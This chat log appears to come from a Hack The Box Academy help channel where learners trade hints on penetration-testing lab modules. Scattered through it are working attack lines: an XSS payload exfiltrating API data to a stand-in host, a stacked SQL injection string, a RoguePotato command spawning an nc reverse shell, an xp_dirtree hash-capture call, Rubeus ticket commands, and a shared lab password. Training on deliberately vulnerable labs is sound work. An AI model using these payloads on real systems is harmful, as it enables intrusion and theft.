is that a box?
Hi everyone!
I need advice from Linux experts
I want to learn Linux administration. I don't know where to start, but for now I started learning to set up Linux as a server for websites. I write basic code in HTML
By browsing the IP address I can see my site, but I cannot see it from outside the network. I know why, but I don't know how to access it from outside the network?!
Can you explain more?! From where to where?
don't self host unless you know what you're doing, host it somewhere else
Once I've had a box with that, to recreate a pin code for a python based terminal in admin page, never seen something like it in a module
Agile was like that
Ah right agile
You will need to portforward from your router. But as @next bronze said I wouldn't do it as the risk-reward isn't that great. Rather host a server from a provider or something
Hmm, understood
BTW does someone know resources to learn Linux sys administration? I need a platform like hackthebox if there is one. I searched on google and found a 6 hour video on YouTube, it is not okay for me because I have problems listening, I am not a native English speaker
hey @hallow kiln , I got it working but I did it with ssh dynamic port forward & on the second host installed the agent.
didn't manage to understand why this works & installing 2 agents didn't, cause if I'll need another pivot I'm not sure that it will work ...
How can one adequately prepare for participation in CTFs that adopt a Jeopardy-style format?
both agents need to connect to the same port, since the proxy server only listen on one port
You're referring to if I'll start another agent?
cause when I did it only through ligolo (2 agents) it didn't work?
(I guess they work on the same port, I didn't change anything, configured the second agent as I did the first one)
If someone know about it, please let me know I'm very curious about this
double pivot with ligolo works, done it a lot of times, if you didn't change anything for the second agent then that's your problem. the second agent needs to connect to the listener of the first agent, which connects to the proxy listener, it's like human centipede but with ligolo agents
@umbral fulcrum https://www.youtube.com/watch?v=P5cvjHvRJr8&t=271s this is a good video demonstration with double pivoting
I just got this answer: C:\Windows\System32\cmd.exe
When I submit, the web told me it's wrong😫
if this is your first question, we need to know the module, section and question
could be a formatting issue
well, INTRODUCTION TO WINDOWS COMMAND LINE the first chapter
oh I haven't done that one, what's the question?
The question is "In what directory can the cmd executable be found? (just the folder name as answer)" and I input "where.exe cmd.exe" in powershell
try System32
wait that's a thing, oh wow
When I input this code, it returns "C:\Windows\System32\cmd.exe"
as the answer? System32 as the answer, does it say it's right?
Wow, it's correct!
Thanks Bro!
Hi it's me again! Still stuck on the ADCS course for ESC4... I did that command : .\Rubeus.exe asktgt /user:administrator /certificate:admin-esc4.pfx /password:Password /ptt ... Got the ticket, here it is : PS C:\Tools> klist
Current LogonId is 0:0xc5e6d
Cached Tickets: (1)
#0> Client: administrator @ LAB.LOCAL
Server: krbtgt/lab.local @ LAB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 1/15/2024 15:27:51 (local)
End Time: 1/16/2024 1:27:51 (local)
Renew Time: 1/22/2024 15:27:51 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
But still got access denied : PS C:\Tools> dir C:\users\molly
dir : Access to the path 'C:\users\molly' is denied.
At line:1 char:1
+ dir C:\users\molly\
+ ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\users\molly\:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Tools> dir \\lab-dc.lab.local\c$\users\molly
dir : Access to the path '\\lab-dc.lab.local\c$\users\molly' is denied.
At line:1 char:1
+ dir \\lab-dc.lab.local\c$\users\molly\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (\\lab-dc.lab.local\c$\users\molly\:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
I tried to ask for a TGS with the cifs service... no luck again
Oh, you can try "System32"?
Hey, I'm done with nmap enumeration module and I wanted to learn/practise more on bypassing firewalls. So what am I supposed to do?
FYI, I used winrs to connect back to the dc and got the file. Really don't understand why I cannot type the file even with the ticket but that worked.
is that the only ticket in your session?
Yes
After getting a TGS for CIFS I got that one too: #3> Client: administrator @ LAB.LOCAL
Server: cifs/lab-dc.lab.local @ LAB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 1/15/2024 15:32:25 (local)
End Time: 1/16/2024 1:31:56 (local)
Renew Time: 1/22/2024 15:31:56 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
PS C:\Tools>
And with winrs got HTTP too.
@next bronze , and I dont find that info... (Abuse ESC4 to change the configuration for the template ESC4. Afterward, submit the value of the property Certificate Name Flag.) by the way thanks a lot for your help
hmm weird so you need to specifically get a ST to get access
tbh I don't use rubeus enough to know why
I use it a lot... but can't figure out why this is not working.
but all good. will try to find that name.
it should just be in the output iirc
@next bronze xD
For Advanced XSS and CSRF Exploitation Skills Assessment, || I'm able to bypass the CSP and execute XSS attacks, but there's no CORS configured (If i'm not wrong) I'm stuck from moving from here. Also, where the XSS payload resides, I don't think I'm getting any hit from the bot viewing it (is it even viewing it?)|| Any nudge would be appreciated
|| I did find a weird thing that, even tho there were no CORS configured, I was getting data back to my exfil server from an auth endpoint when I visit it myself? Would be nice if I can get this explained ||
You're banned from DM'ing me from now on @quick crane 

yo guys does anyone know anything abt how to change an SQL command through the query
my task is to change the price of a product through a search bar
Your Query: SELECT * FROM products WHERE prod_name = 'searchfor'
So I am in the Advanced XSS and CSRF Exploitation
and it wants me to access the local storage property to grab the auth bearer that is stored in victims local storage, and then set Authorization header.
This is the module Enumeration internal APIs
try {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://api.vulnerablesite.htb/v1/sessions', false);
xhr.withCredentials = true;
xhr.send();
var msg = xhr.responseText;
} catch (error) {
var msg = error;
}
var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(msg), false);
exfil.send();
What did he do 😂
does someone have a good example how I would exfiltrate the bearer
UPDATE ... SET ... WHERE ....
HOLD ON
SELECT * FROM products WHERE prod_name = 'UPDATE products SET prod_price = 3000 WHERE prod_name = The Holy Grail'
this ends up as the query
UPDATE products SET prod_price = 3000 WHERE prod_name = 'The Holy Grail' this is the command i typed in but i got a syntax error
and here the holy grail is without ' ' just to show it
if you're asking for help for homework then that's all the help you're gonna get, I don't recall there being a module about this
you need to finish the first query using ; and then start the second, using both SELECT and UPDATE in the same query is not supported.
and then the trick is to use the right amount of ' and " to break out of the original query and create valid syntax
I'm doing the Attacking Applications Connecting to Services and having trouble debugging the 'octopus checker' binary... I am trying to set the breakpoint to the address where it calls the SQLDriverConnect function but gdb is just telling me that it 'Cannot insert breakpoint 1. Cannot access memory at address etc..'. I am following the module exactly. Do I need to format the address breakpoint command a certain way?
OHHHHH SMART IDEA OMG ILL TRY!!
I have tried breakpoint commands b *0x11b0 and b *0x00000000000011b0
The Holy Grail; UPDATE products SET prod_price = 3000 WHERE prod_name = 'The Holy Grail'. like this?
you need to run before adding the breakpoint
run then add the breakpoint then run again
on htb windows privilege escalation for the kernel exploit, is it malfunctioning? i see a user hacker on there...seems like they didn't clean things out
works perfectly. What's the issue?
none of the exploits work either lol
didn't work 😔
Looks better, but you need to make sure you insert the ' at the right place, in your example it doesn't break out of the original query until right before the second "the holy grail"
ARGHHHH COMPLICATED
so the problem is the second grail
Your Query: SELECT * FROM products WHERE prod_name = 'The Holy Grail'; UPDATE products SET prod_price = 3000 WHERE prod_name = The Holy Grail'
tried this but failed
Unfortunately I seem to get the exact same error. I actually can't seem to create any breakpoints. I have tried running in sudo as well just in case... any ideas? Going to try just transferring it to my own machine and looking at it there
@faint rampart when i run the hivenightmare exploit, i don't see the file you're supposed to pull from impacket
Are you just missing a single quote on the prod_name at the end?
if only i knew my friend TT
does it tell you what's wrong? the beginning part looks much better, it selects then breaks out and updates. I see you are missing a ' before the second "The Holy Grail" and you may have to consider that there is also a ' at the end of the original query. You can either use the original ' or learn how to comment it out in sql
try what you did above but just add a ' before the second "The Holy Grail"
so i have 0 clue what to do here haha
The Holy Grail'; UPDATE products SET prod_price = 3000 WHERE prod_name = 'The Holy Grail'
Your Query: SELECT * FROM products WHERE prod_name = 'The Holy Grail'; UPDATE products SET prod_price = 3000 WHERE prod_name = 'The Holy Grail''
this is the outcome
it doesnt tell me whats wrong no
WAIT
IT CHANGED THE PROD
INTO THE 3K THAT I WANT
i just noticed TT
Yup that's what I did, but you can achieve the same results on the host directly. I recall reading somewhere about a Position Independent Executable aka PIE, so the base address changes each time you run it, you need to run it before setting a breakpoint for that reason.
then run it afterwards again, they left that part out in the module section for some reason.
The Holy Grail'; UPDATE products SET prod_price = 3000 WHERE prod_name = 'The Holy Grail - this is the right answer
THANK U OLLI <33
Ah I see that makes sense. Managed to get it working on my machine. Thanks for your help
that's the one that even works perfectly, you should probably move to a writable directory, I think it copies the file to the current working directory
anytime 
also check the privileges if they are enabled
Lemme check my notes lol dont remember
im able to save the hashes to a file and make and write to the file in that directory O.o
but copy
can i DM you @faint rampart
A little bit occupied rn maybe be a little patient for someone to come assist, or wait a little
sorry
Its fine man 😅 dont apologise
If you used the printnightmare psh exploit you need to log off the box so the privileges reflect after logon.
I'd advise you to ignore the hacker user and just make yours lol
got it, i figured that as much
If you wanna use the service tracing CVE (the last one) you could use some other payload, I had issues with the https one, shell kept dying.
hiii
You could also use some uac bypass scripts, didn't try that yet but it should work. like RunasCs or check the next couple sessions for a Bypass-UAC script
hey for the injection assessment w/ the ssrf chained to the exfil exploitation would someone be willing to talk to me direct about the approach or methods for doing this bc i don't know if you're supposed to use something from earlier in the modules or something else but it seems kinda weird .. ☮️
having trouble using burp intruder for burp intruder chapter in using proxies can someone help me in telling me where I'm going wrong
Any hints for AD Enumeration & Attacks - Skills Assessment Part I?
Got sql service password but can't authenticate to that service inside AD network. Rev shell is also very unstable and many of the tools are not working because of that. I setup port forwarding with meterpreter shell so I can use tools directly from my machine too.
||spray||
Hi! I am a bit lost in Active Directory Enumeration & Attacks Assessment II
Currently I am at:
- Q8: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host. Got LOST
- Q9: Answered from Bloodhound C*** username
- Q10: Crack this user's password hash and submit the cleartext password as your answer. Got LOST
I am RDP'd in with both of the accounts user A---- and user B---- running Inveigh with 0 luck.
Got a bunch of kerberoast tickets but no luck with hashcat.
Can anyone point me in the right direction? Much appreciated ❤️
Hi... I just owned Monitored from Season 4 and forgot to share my achievement on LinkedIn... How do I get the achievement popup to show up again so I can post it on my social media?
@marble pond Can you help me?
not aris, but maybe better place on #1080884182336675872 ?
@supple gorge It says No Access
Hmm, it works for me, did you link your htb account to your discord through the bot commands or something of the sort?
Not sure what else could be the case
Which part?
dig further into the machine and dump everything for q8, try to look for a way to capture the hash for q10
I used snaffler, and i might have missed something but i don't think so
for which question?
q8
okay
@oblique spoke Question number 4 I got 1,2,3 but then got stuck.
Dump everything on the microsoft machine
you gonna see some cleartext pw in the logs
i was already able to dump with kerberos::list, is this what you meant?
you have question 6 yes?
and 7?
i have 7 yes, but that user is only db user
yeah dump everything on that host, you should have system
Hello, can someone help me with the module "Introduction to Digital Forensics" (more precisely the "Practical Digital Forensics Scenario" exercise part) please? :)
didn't work
then you didn't look hard enough
I usually like to dump with multiple tools, I've seen some cases where different tools had different results, even supposedly using the same methods
my order of preference being impacket -> lazagne -> mimikatz
Lasagna?
Impacket didn't give me any output, didn't try lazagne and i am trying with mimikatz
Wow, massive respect for that instantaneous garfield follow up.
I mean, you don't have creds to use Impacket iirc, unless you dumped sam and got the local admin hash
which I've done because I like impacket output so much
I tried to dump sam but no rights in rdp with both users
I do that too lol
huh? don't you have system?
No i have 2 usernames || BR086 and AB290 || with pw
what how'd you get the flag then
Which one? The sql?
flag 7, you need admin for that
anyways, if you have a service user, check what privs they have
Oh yeah i logged in to the sql machine with the web creds and used a tool to escalate the priv then made a reverse shell with ncat and read the file
But that was on the other machine
Okay im gonna check that tomorrow its pretty late here, thank you for the tip
yes check that machine
in multi box environments, escalating to system isn't necessarily the end of the box. You should do post system/root credential harvesting for lateral movement
guys I struggle at AD Enumeration & Attacks - Skills Assessment Part II Q7 "Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. " I try to upload the compiled executable of JuicyPotato but everytime i get an access denied error
are you uploading to a dir where the user has write perms to
The advanced Deserialization Lab has really bad performance, it's almost impossible to use, and it sucks because we are supposed to use Visual Studio, dnSpy and some other tools that use a lot of RAM. I spent all day in the lab and it is very frustrating. I don't think it has to be a Windows 10 vm, it can be a Windows 7-8 maybe.
I tried to log into the wrong host with the first creds 💀 Now the exercise is flying by
may I DM ?
is there a difference between sub-domains and a virtual host?
yes
vhosts are hosts that are stored on the same machine. technically they don't even need to be the same domain at all.
sub domains can have entirely different IPs
for ex, shared web hosting servers? Each domain on there is implemented with vhosts even though they're separate clients with separate domains
interesting
enumerating vhosts is just an easy way to also enum sub domains in some scenarios
working on ffuf fuzzing sub-domains and vhosts
The Password Attacks Module is no joke

For the following question, "Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. " I was able to get the password using the ||Default Creds list|| adding entries for MySql to a new .list file like the example gave, but when I run it through hydra it kept getting an error. Are we supposed to be able to use the brute forcing tool when doing this section or is it supposed to be guess and check? Additionally I don't see what having sam's credentials do for you as I wasn't able to do anything while ssh'd into the account.
You can only access the sql server internally
Anytime I tried to login to the mysql server from sam's account i got an error.
Id start with reading #welcome and verifying your account so you can ask in better channels
Well Sam might not be an sql user. This is why they have you do a short brute force manually
The default creds list is 100% intended
Sup? I am doing Introduction to Digital Forensics and I have problems to understand this part "Accessed Time (A): This timestamp reflects the last occasion when the file was accessed or read, updating whenever the file is opened or otherwise engaged.". What means "engaged" in this context?
Are we supposed to be able to automate it or do it manually? I was able to submit the correct answer from the list but when I tried to sign in from the pwnbox I kept getting errors. Is there a database name that we are supposed to find?
Shouldn't need to just mysql -u [username] -p [password] afaik
You have to be connected to Sam via ssh
And run through the list that way
I am, I also just pm'ed a snippet of what I keep seeing.
I dont recall if I had to specify anything like a database name
¯\_(ツ)_/¯
It's been ages tbh
I figured it out, dumb mistake/syntax but we're golden.
Ye that tends to be the case
did as he did, but when I start a new session I get:
error: a tunnel is already using this interface name. Please use a different name using the --tun option
& when I do:
start --tun something_else
I get:
ERRO[0221] Unable to create tunnel, err:unable to create tun interface 'something_else' (tun.New no such device), make sure you've created the tun interface and that it's not in use
Guys what am I doing wrong (Q7, AD Enumeration & Attacks - Skills Assessment Part 2)?
SQL> xp_cmdshell C:\Users\Public\RoguePotato.exe -r 172.16.7.240 -l 9999 -c "{69F9CB25-25E2-4BE1-AB8F-07AA7CB535E8}" -e "c:\Users\Public\nc.exe 172.16.7.240 8443 -e cmd"
output
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{69F9CB25-25E2-4BE1-AB8F-07AA7CB535E8}
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written:106 bytes
[-] Named pipe didn't received any connect request. Exiting ...
NULL
have you created the interface?
try a different clsid
Evening all - Just looking to get a sanity check here. I'm on the knowledge check for the Getting Started module, so looking for a point in the right direction, rather than actual help.
I've gone through and done my Web Enumeration on the target IP, found and documented quite a nice amount of info. Now I'm looking to gain a foothold. I reckon I know how to do it, once logged in, although I cannot seem to get the password.
Spoilers below:
||I found the below, when searching the site||
||Admin.xml||
||Username: Admin||
||Password: d033e22ae348aeb5660fc2140aec35850c4da997||
||Email: admin@gettingstarted.com||
Am I right in thinking the ||Password|| is encoded? I've tried decoding it as Base64, ROT13 and hex but it doesn't output anything. So could I assume this is hashed? But I feel that's me going too deep and getting sidetracked 😄
Many thanks,
Is the access to 10.10.110.35 due to the upload of the PDF?
I never did those modules but the password does indeed look like MD5 hash, I would give it a try.
I'm not sure how....
😔
I did the second just as the first one ...
same as how you created the first tunnel
being able to read errors and fix them is a core skill
It's not an MD5 - getting errors when trying to decode it. I'm also reading it's not possible to decode MD5 to its original output
you absolutely can reverse MD5. its called hash cracking
Well the idea of the tools is not to decode the hash, it's to find a hash that matches from an already existing database of hashes.
Ah apologies, let me search again! Thank you!
Np!
just eyeballing it and I agree it doesnt look like md5 though. but def looks like a hash, maybe sha
@fallow snow I would suggest looking into a tool called John the Ripper. You will definitely use it later on multiple times
Thanks, I found an online hash checker, and have successfully decoded it.
Thank you 🙂
Great!
just for future reference when referring to hashes, the term would be 'cracked' not 'decoded'
but congrats
no worries, just a bit of terminology to learn
https://academy.hackthebox.com/module/143/section/1484
" Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop. "
For this command(sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap) to run successfully , I would have to pivot to that IP address right?(I ran the command on the attack machine and of course it did not work.)
can i paste screenshots in this thread?
after you verify your account with #welcome
- is common for HTB's internal IPs, so yeah probably have to pivot
Hello this is my first time in the HTB discord since I'm seeking a bit of help on the Stack-Based Buffer Overflows on Linux - Identifying Bad Characters module
In gdb im trying to run the command in the screenshot to pass the python output to the input of the program
Here's my issue, when I try to pass a NOP (\x90) to the program the NOP gets encoded in UTF8, so when I inspect the stack, the values inside it are not actually NOPs, but instead these are represented in two bytes (due to UTF8 encoding)
so what should be 0x90 is instead 0xc2 0x90 inside the stack
So when trying buffer overflows this completely messes up the entire process because:
1- The NOPs are not being read as actual NOPs
2- each \x90 now occupies two bytes of space instead of one byte which completely shifts my offset to the rip or the instruction pointer
Does anyone know a way to solve this?
I just figured what U saying ...
every tunnel must connect to a new interface which needed to be up, so the amount of the session is the amount of the interfaces
damn I got my head deep in the ground I couldn't understand what @full nimbus was explaining me
thanx @next bronze , @hallow kiln , @full nimbus & @fathom pendant
Yep you can chain listeners.
You can also drop the current connection and use a new session
As it's still technically connected
No need to make n amount of interfaces
that's where the new update comes in, you don't have to drop the connection, make an interface for every tunnel. I don't think it lets you switch the session like that anymore
Newer version forces you to stop the current tunnel and start a new one
Yep but you can still stop the tunnel, switch session, start
I did this in the pivoting module for practice in the double pivot sections
As long as you have the listener set up on the session it'll work
if you stop the tunnel wouldn't it kill the connection?
Well the way that older versions worked is it stopped the tunnel from sessionA and started it on sessionB
yep
still getting the same error
Because you have the listener pointing back to your proxy
ah okay didn't test it enough to find out
So once sessionB is initiated, you can drop the tunnel A and switch to B
It's one of those weird things
¯\_(ツ)_/¯
But it's basically still connected through the session listener
Bc when you start the agent on B you point it back to A in the chain
Also just bc your rdp session may drop, the commands Are still running on the desktop you used
interesting
Ye so it's still listening
I'm definitely interested though in its continued development, hope they bring back the tunnel swapping feature
Or give it an argument flag like start --switch
Am I being dumb, or does this not work on purpose?
It doesn't work on purpose. The purpose of signing in as admin is to get plug-in versions
Fwiw you can edit the themes without being signed in as admin
The blah/themes/
hm, ok. But iut doesn't have an image upload plugin.. it only have a theme and send data. So I don't see how I could use that?
Or do plugins automatically get like root access?
Based on the plug-in information and vulnerabilities: go off that
Assuming I could download a vulnerable plugin?
One of those looks interesting
You don't need to download one. Just use what's available to you
Welp, MY Pwnbox ran out of time 😄 So it's a tomorrow job now!
Awesome, I'll take note and have a crack again tomorrow.
Highly suggest setting up your own vm so you're not time restricted lol
Once I start on the actual HTB website, I will. But whilst working full time, I like the 2 hour cap, as it allows me to learn, but also makes it so I don't burn myself out 😄
and then I go to bed thinking about it and more motivated to tackle it again in the morning/evening
It allows you to save things as well
So you can easily pick back up if your notes missed something
Ya, like logs and stuff
I.e. cracked creds
yeye. Currently using VSCode to make notes of it all
How come? I really like vsc
Obsidian supports markdown and allows you to backlink to other note pages
hmm, I'll take a looksie!
so you can make headers
subheadings
subsubheadings
ahhh niceee!
Yeah currently I do this:
-[[ Web Enumeration
NMAP initial IP to find open ports
use --open to limit to only open ports
use -oA to output and include a file name to document all findings
Full TCP Port scan can be done using: nmap -p- --open -oA <fileName> <targetIP> (this takes a while)
use nmap scripts or targeted ports to find more info with: nmap -sC -p <port,port> -oA <fileName> <targetIP>
if targeting Web Servers, you can specify scripts, this is a http enumeration script to find directories:
nmap -sV --script=http-enum -oA <fileName> <targetIP>
https://academy.hackthebox.com/module/143/section/1484
I don't know why This scan (||sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap||)
) is still generating an error even though I followed the steps to run a pivot (I used the 'Enabling Dynamic Port Forwarding with SSH' method too from section 3 of the pivot module).
tyty - Anyhow. Good night. Again thanks for the help!
CherryTree old but gold
I suggest looking into the ligolo-ng tool, it's far better for pivoting
Also there is a linux host on this network you can use
obsidian is just better vscode for notes, I used to write markdown in vsc, found out that obsidian does everything better
172.16.5.225 htb-student:HTB_@cademy_stdnt! @cedar void
do yall actually use notes? I would always try to use things like obsidian for notes but i always write them down and never look at them anymore
Hey anyone around to help with Footprinting-SMTP section?
yup, all the time
can i have a link to a page of your notes to see how you write stuff down?
i either always write everything, which is kinda pointless, or write too little
then make them better. writing your own notes is the best way to retain information and makes it easier to refer back
I ran this command (for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ; done) on the target machine and it returned three internal addresses (including the one you listed)
Does this have advice for HTBA SMTP in footprinting, the second question? "Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer."
sorry I cannot share most of my notes.
Generally I'll have a couple different types of notes. I'll have pages that are overviews/conceptual that summarize a topic so I can understand, and then I'll have more specific note pages that are basically annotated cheatsheets
and I use folders to organize by topics
this shows a bit of organization. Not as clean as I could make it though
You're expressly told about the linux machine
What have you attempted to do?
smtp-user-enum
Interesting. At some point i did have it organized like that, the most useful thing for me was going back to linux commands for tools. I will start again on this. Ty for sharing
you tried a certain framework?
I think I started off confused since the section didn't touch on enumerating users within smtp so I was kind of lost at the get go on how to start it
you can use the msfconsole tool to enumerate remote services that may have the smtp port too
what do you mean by that, remote services that have the smtp port too?
Sorry, I meant remote services, as in the remote target
I basically started out organizing it by academy modules, and then as I've started to gather information from other places or doing overlapping modules I've started moving things around
googling the first answer in that section gives you more information that can aid you in answering the 2nd question too.
So I enumerated the service successfully, I tried looking in msfconsole for that version and nothing to my knowledge came up
I used nmap --script smtp-enum-users.nse xx.xxx.xxx.xx and got some users
^ I got the flag btw, thanks @cedar void
Can someone help me with this?
Module: Advanced Xss and CSRF Exploitation
Section: Bypassing CSRF Tokens via CORS Misconfigurations
I can find the HTML element and post parameter for the final payload. I cannot get the CORS misconfiguration to work and promote my privileges.
i can't beat the hard footprinting lab still
i'm forever hard locked on this stupid lab
What are you stuck on?
i got the creds but i cant get imaps to work
Take a step back: why can't you get it to work
don't work means what? what's the error
could either be your command is wrong or your creds are wrong
i did login then user name and pass it worked on pop3s
wrap spoilers in double bars (||)
or use /spoiler at the start, like a command, instead of at the end
kk
i haven't done that module, so I won't be much help sorry, but im sure someone else here has
i just want to be free from this stupid lab
Pop3s isn't the way, imaps is gonna help more
i couldnt login in for some reason
said the command was wrong but it wasnt
[Any character] login username password
i just used login in lol
bad error in IMAP command received by server
Paste exactly what you're doing, replacing the username and password with user and pass
Imap, as stated, requires a prefix character before the command
klist lists the krb5 variable right? i put a keytab file location to the krb5 variable but klist doesn't work
I need help.
So I Navigate it on elastic but it won’t go through need help
The question is
Just did it: was able to use imap command
Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on “Discover”. Then, click on the calendar icon, specify “last 15 years”, and click on “Apply”. Finally, choose the “windows*” index pattern. Now, execute the KQL query that is mentioned in the “Comparison Operators” part of this section and enter the username of the disabled account as your answer. Just the username; no need to account for the domain.
Don't use asterisk
Use any standard character
And a space
Actually nvm * works
i had to use a t
You can just use any combination of characters before the command, you just need a space after the prefix
I literally keysmashed and the command went through
Klist should get it or kinit iirc it's been a minute since I did this
i c ok danke
now i dont see what i need i changed to the directory
The module has a list of imap commands
yea im using them right now
The only one I'll say to change is the fetch
thats the one i just tried
Instead of 'all' use 'body[]'
okay
You need to select the mailbox with messages in it to fetch it
i did but it wont take it
Did you list all mailboxes?
When you select a mailbox it will tell you if there's emails in it
[N] exists
Also it is entirely possible to get it with pop3s, imaps is just "smoother" to see what you're doing
Logged in and retrieved with 0 issues
So both imaps and pop3s work as intended for this skill assessment
anyone facing problem with spawning machines ?
Nope, took a few minutes but the machine was smooth
stuck for 15 min
Try changing vpn region and see if that makes a difference
You'd obviously need to download a new vpn
thanks , I am good now
👍 sometimes the servers shit the bed
Hi, currently working on "Introduction to Deserialization Attacks" skill assessment II, I was able to get admin on the page but I'm stuck in getting RCE, Any hint will be appreciated.
any advice for /home/carlos@inlanefreight.htb/.scripts/john.keytab
i mean the impersonate the ivc_ guy
from carlos acc i did i was able to get the aes hash
but not the ntlm hash for that acc...
- 0 Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
Crack that hash 😉
The hash you get from there is great for the next step
oh i c ok danke and also when u do su - why do u need to put carlos@inlanefreight.htb instead of just carlos
The linux host is connected to a domain, and is requiring domain user logins
I forget how I cracked it but it wasn't difficult from what I remember.
no i mean how did it authenticate if its not in passwd file
It's authing through a domain controller
back to this , I solved the challenge while ago , now I am trying to refresh my memory
I use the same cmd as my note , but can't get the flag , it's always closed
Maybe you're missing out on some evasion?
thanks , my notes were fucked up it wasn't the right cmd
this awkward 
I need help, I'm really confused on the explanation of getting MSSQL hashes using responder for an account, how exactly do I get the hash for an account other than the one I am logged into using responder?
It's calling out using a user-agent
So instead of asking as [user] it's asking as [service]
Ok I got the hash, I don't know what the hell happened
exec master..xp_dirtree '\\10.10.14.29\share\'
when I run this why does it trigger mssqlsvc to do something?
It's asking sqlsvc to query an smb server
okay
so used to mysql as it's the db i worked with in the past, but not mssql, it's super alien to me
but I got the basic commands jotted down at least
The skill assessment involving it is a bit out there to say the least btw
Are you sure it ONLY deletes?
Elaborate
This is vague af
What module and section are you working on
What have you done, what are you struggling with
OK so this is the wrong channel entirely
Read #welcome to find out how to access more or the server #1193249174301442128 is the more appropriate place to ask for nudges
I found the bizness machine user flag
This channel is for help with htb academy modules
You will not get help with main platform labs here
But as soon as I submit, you are telling me it is wrong.
Sir
Ok ok
Read my previous statements
This is not the place to ask for help
hey guys. Im doing the securecoding module and have found that jsnice got rid of the packer and detection functions. Does anyone have a recommended packer detection and variable renamer for javascript?
Not a Packer detection per se, but online compiler https://www.programiz.com/javascript/online-compiler/
hmmm I really need something that renames the variables so they make sense so I can reverse engineer them like in the module
Just use a print statement
It works just the same and I believe it's mentioned
like just run the code and output the result so no need to manually analyse what the codes doing?
Replacing the exec or w/e statement with print()
Ah it's a t4 module. That's why I didn't recognize it. Javascript deobfuscation is the module that goes over a bunch of the deobfuscation techniques
Yeah I did that one years ago. Might need a refresher I think
If you're fairly familiar with js it takes maybe an hourish to complete
Yeah the summary of the advanced module even recommends doing it lol
yeah I thought id be good because I did it many moons ago haha.
Time for a bit of a refresher then
yep!
Hello, I suppress the proxy window and intruder also in Burp suite
How can I resettle it
go to view at the top and click on proxy and intruder
did you mean you clicked on hide?
I clicked on the tool and then it popped out of burp to become a window and I deleted this window so it disappeared from burp.
clicking on 'Restore default layout' on View tab doesnt work?
Thanks man
Np
can anyone maybe allow me to add them and help an aspiring cybersecurity enthusiast start on HTB?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
thx.
Lab machine performance doesn't change whether you are subscribed or not? Think its just a coincidence that I am suffering from a lot of lag since I cancelled my sub but just wanted to make sure.
reach out to support
i dumped sam but cant move from SQ01 is there any suggestion? smb server doesnt really work. and the nc shell is weak to run mimikatz on the machine
👍
lots of options, use the local admin hash to dump more things with impacket/netexec, or get a better shell, or run mimikatz in non interactive mode, or save a memdump of lsass
Hello, I try to complete final assessments of Login Brute Forcing module in Academy. I have the user whose username should be guessed as well as the password against SSH service. I have got like 15 variants of his username and around 463 passwords (6945 attempts in total). However the bruteforce by hydra takes like hours (after 31 mins of running still estimated 2,5 hrs to be running). I'm afraid that I'm not even able to bruteforce it as the testing container with SSH is running like 1 hour.
Is there any possibility how to optimize hydra? (I tried to play with -t parameter, but no significant change)
fucking did it, the MS01 admin flag is done. now the rest of the shit 😄 thanks
Hello I'm stuck on webenum module pwnbox exercise.
It say: "Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag."
This is a bit imprecise. What are we actually supposed to search for ?
that's the point, you don't know, so try the things taught in the section
Hi, can I DM you about this whitebox pentesting skill assessment? I know endpoint|| \ping|| and|| '{"debug": true, "ip":"Payload"}'|| is the cause. I would love to chat with you and get a nudge ideas off. Thanks
puhhh 😅
I've tried them all, but how am I supposed to know what to look for.
The flag is in format HTB{fak3_flag}
Sure
@tidal kelp You're like the only person who has actually followed the rules and asked before DMing ❤️
It's a breath of fresh air ik
Any help here?
A big mountain air double lungful
have you considered going through the section slowly and trying everything against the spawned webserver?
the worst part is when you have someone that did ask for permission the first time: but not subsequent times lol
@next bronze you really made me crack your about me. But appreciate the eggplant 👍
Hi, how did you manage to get that user with bloodhound ? I've been trying with both legacy and CE version, and never showed me any session on the host, so would be curious to know how you did it 😄 I can help also on the other questions if you need
Okay , I'm trying to configure the vpn so that I can work better.
On this page
https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access
it says we should have a "Connect to HTB" near our profile picture
I don't have it
that page is more related to https://app.hackthebox.com/
the academy uses a different vpn
and any section that requires the vpn will have a download for it
but if it's a public ip:port then it's not needed
i.e. 94.136.101.26:56004
